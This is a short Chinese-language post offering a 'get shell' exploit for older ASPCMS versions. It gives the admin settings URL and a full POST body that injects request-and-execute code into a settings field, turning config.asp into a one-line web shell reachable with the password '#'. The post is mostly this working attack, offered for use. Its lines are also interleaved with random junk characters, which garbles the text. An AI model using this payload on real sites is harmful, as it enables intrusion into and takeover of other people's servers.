老的ASPCMS版本的秒杀拿SHELL漏洞! M- c' B' ?" l" L
! _/ ~% m9 J! C6 } 找到后台。。。然后/ m4 m. |* v) [5 A
3 Q0 E4 v9 u1 _8 F3 J
/admin/_system/AspCms_SiteSetting.asp?action=saves
% x6 N) d" R2 j d/ [( y* M
; S( b2 R+ C; b! Q直接POST
* \3 v" I1 P1 H0 o3 c
; I) Y$ `/ a- e+ E/ I& mrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=18 U; Y" ~) K. i7 m# M5 ?/ g1 q) [# ^
/ ?, i5 u% ~, D: b, a) b再连接配置文件config.asp 密码为#
" {# M4 ^5 [: r* ~; k% I |